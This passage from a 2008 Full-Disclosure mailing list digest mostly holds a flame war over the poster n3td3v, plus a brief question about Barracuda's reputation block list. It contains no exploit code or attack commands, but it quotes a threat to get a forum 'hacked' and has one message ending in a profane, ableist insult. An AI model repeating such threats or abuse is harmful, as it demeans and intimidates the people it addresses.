To: n3td3v <xploitable@...il.com>, full-disclosure@...ts.grok.org.uk
Message-ID:
<6f80feaf0812221434o4232c660j65375aacefcddad0@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
When we look what you say in december 2008, and the look at your posts on
that forum in 2004, it's impossible to believe one second that it's not you.
2008/12/22 n3td3v <xploitable@...il.com>
> Looks like you've been joe jobbed, not just the folks on that forum.
>
> On Mon, Dec 22, 2008 at 8:15 PM, waveroad waveroad <waveroad@...il.com>
> wrote:
> > Mine is that one:
> > http://www.bigblueball.com/forums/search.php?searchid=903472
> >
> http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.html
> > etc ..
> >
> > N3td3v's quote of the day : "Trust me, if you want to be rude, i'll be
> rude
> > back to you, and if you keep doing it, i'll make sure this website gets
> > hacked."
> > (http://www.bigblueball.com/forums/forum-support/28972-serious-post.html
> )
> >
> > It's funny to hear that from a guy who say: "we're letting the bad guys
> win,
> > whitehat powaa, i'm serious, MI5 will hire me one day, etc"
> >
> > 2008/12/22 Ureleet <ureleet@...il.com>
> >>
> >> this is a favorite of mine tho:
> >>
> >>
> http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/45421c02/attachment-0001.html
------------------------------
Message: 23
Date: Mon, 22 Dec 2008 17:42:24 -0500
From: Valdis.Kletnieks@...edu
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: full-disclosure@...ts.grok.org.uk
Message-ID: <5140.1229985744@...ing-police.cc.vt.edu>
Content-Type: text/plain; charset="us-ascii"
On Mon, 22 Dec 2008 21:53:29 GMT, n3td3v said:
> It seems the real researchers aren't welcome here anymore.
How does that follow from your experience here, given that you claim to
be a blogger rather than an actual serious researcher?
(And before you say "but I *am* a researcher", keep in mind that many on
the list will immediately counter "researching what?")
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/997984d5/attachment-0001.bin
------------------------------
Message: 24
Date: Mon, 22 Dec 2008 17:44:00 -0500
From: "j-f sentier" <j.sentiar@...il.com>
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: n3td3v <xploitable@...il.com>, full-disclosure@...ts.grok.org.uk
Message-ID:
<6f80feaf0812221444v22ae2562rada181184b8f36c8@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Kevin is a good security researcher, but you n3td3v you are only a good
trouble researcher.
Let us see one poc, some code, something innovating come on, we're waiting
to see this since 6 years.
You think you know something about security because you feel safe behind
your keyboard you fucking scary retarded.
2008/12/22 n3td3v <xploitable@...il.com>
> On Mon, Dec 22, 2008 at 9:30 PM, Kevin Finisterre (lists)
> <kf_lists@...italmunition.com> wrote:
> >> gtfo of fd.
> >
> > No problem... I'd been away for some time now. Sorry I bothered
> > dropping in.
> >
> > -KF
>
> Don't worry, they tell me to GTFO of FD as well.
>
> It seems the real researchers aren't welcome here anymore.
>
> :(
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/e0550def/attachment-0001.html
------------------------------
Message: 25
Date: Mon, 22 Dec 2008 22:53:29 +0000
From: n3td3v <xploitable@...il.com>
Subject: [Full-disclosure] This list has run its course
To: full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221453m1d5cf1cfp6456ce8e9f686812@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Real researchers who should be taken seriously aren't taken seriously anymore.
I'm leaving full-disclosure because of the abuse.
It's just turned into flames to spin people up, I don't get a chance
to talk about security or my skill set.
It's abuse after abuse after abuse.
Sorry, I can't take it anymore.
Got to go, bye.
------------------------------
Message: 26
Date: Mon, 22 Dec 2008 22:57:58 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: Valdis.Kletnieks@...edu, full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221457o59346a7dl7f323a731ebcc263@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
This "blogger" that you don't take seriously is gone.
On Mon, Dec 22, 2008 at 10:42 PM, <Valdis.Kletnieks@...edu> wrote:
> On Mon, 22 Dec 2008 21:53:29 GMT, n3td3v said:
>
>> It seems the real researchers aren't welcome here anymore.
>
> How does that follow from your experience here, given that you claim to
> be a blogger rather than an actual serious researcher?
>
> (And before you say "but I *am* a researcher", keep in mind that many on
> the list will immediately counter "researching what?")
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------------------------------
Message: 27
Date: Mon, 22 Dec 2008 22:59:18 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] This list has run its course
To: "Ben Preston" <benjamin.preston@...il.com>,
full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221459l59a1f85wb6bd238c43b19f31@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Won't be back on this list, n3td3v will continue elsewhere on the
internet, just not "HERE".
On Mon, Dec 22, 2008 at 10:56 PM, Ben Preston
<benjamin.preston@...il.com> wrote:
> Bye. See you in a few months.
>
> --
>
> Ben
>
------------------------------
Message: 28
Date: Mon, 22 Dec 2008 18:12:33 -0500
From: "Elazar Broad" <elazar@...hmail.com>
Subject: [Full-disclosure] Barracuda Reputation Block List
To: full-disclosure@...ts.grok.org.uk
Message-ID: <20081222231233.F1E1820040@...p.hushmail.com>
Content-Type: text/plain; charset="UTF-8"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?
elazar
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
wpwEAQECAAYFAklQHuEACgkQi04xwClgpZhh5QP8D3SB52oQNBj+PrJYxw9hImgZiznE
Qa3XJmAOn2b7f1P/1oPCIoByjcLGe6U4J8+JJUl3QPr3P4wgAwHMqbf3Yy+4doBTVGnB
4jOKHSQ+wP+lz/hMUMTJMAnQGgLhcgt7ulRNi8WMYcHAsVyl5uxu8l+WMQq2FhuYxUfm
m57Hxz8=
=GX/H
-----END PGP SIGNATURE-----
--
Not having a degree dragging you down?? Click here for free information.
http://tagline.hushmail.com/fc/PnY6qxtpfWJSSKs8QEHNNaIVpHqi0Ph0jajkuMOaz4rQFSSwqjohy/
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 46, Issue 43
***********************************************
**********************************************************
To ensure compliance with requirements imposed by U.S.
Treasury Regulations, Proskauer Rose LLP informs you that
any U.S. tax advice contained in this communication
(including any attachments) was not intended or written to
be used, and cannot be used, for the purpose of (i)
avoiding penalties under the Internal Revenue Code or (ii)
promoting, marketing or recommending to another party any
transaction or matter addressed herein.
*********************************************************
This message and its attachments are sent from a law firm
and may contain information that is confidential and
protected by privilege from disclosure. If you are not the
intended recipient, you are prohibited from printing,
copying, forwarding or saving them. Please delete the
message and attachments without printing, copying,
forwarding or saving them, and notify the sender
immediately.
=============================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists